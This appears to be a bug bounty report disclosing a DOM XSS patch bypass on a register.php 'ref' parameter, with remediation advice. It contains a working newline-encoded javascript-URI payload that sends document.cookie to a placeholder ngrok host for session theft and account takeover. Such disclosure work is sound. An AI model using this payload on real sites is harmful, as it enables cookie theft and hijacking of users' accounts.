BugBountyHunter

Hey mate,

Using a previous report for a DOM XSS on the endpoint register.php via the parameter ref=. Playing with this I was able to find a bypass for the current patch, using newline encodings we can achieve XSS. DUe to the lack of HttpOnly flag on drps cookies we can leak this token for a full ATO.

Impact:

Due to the lack of httponly on the drps cookie it is entirely possible using the payload below to steal a drps cookie when they click "Return to previous page" on the regiser.php endpoint with the ref parameter.

jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`

Steps to Reproduce:

(Doctor NOT logged in)

• Visit the endpoint register.php
• Append the following payload to the URL and press "Enter"

?ref=jav%0Aascr%0Aipt:confirm(document.domain);

• Now click "Return to previous page" and observe the payload triggering.

(Logged in as Doctor)

• Visit the endpoint register.php
• Start your Ngrok server.
• Append the following payload to the URL and press "Enter"

?ref=jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`

• Now click "Return to previous page" and observe the cookie has been sent to our ngrok server.

Remeditation:

Set the flag HttpOnly on the doctors cookies and disallow for javascript URI redirections.

(Please do verify these remediation steps to ensure they are accurate)

Best regards,

Amec0e.

In Collaboration with thebinarybot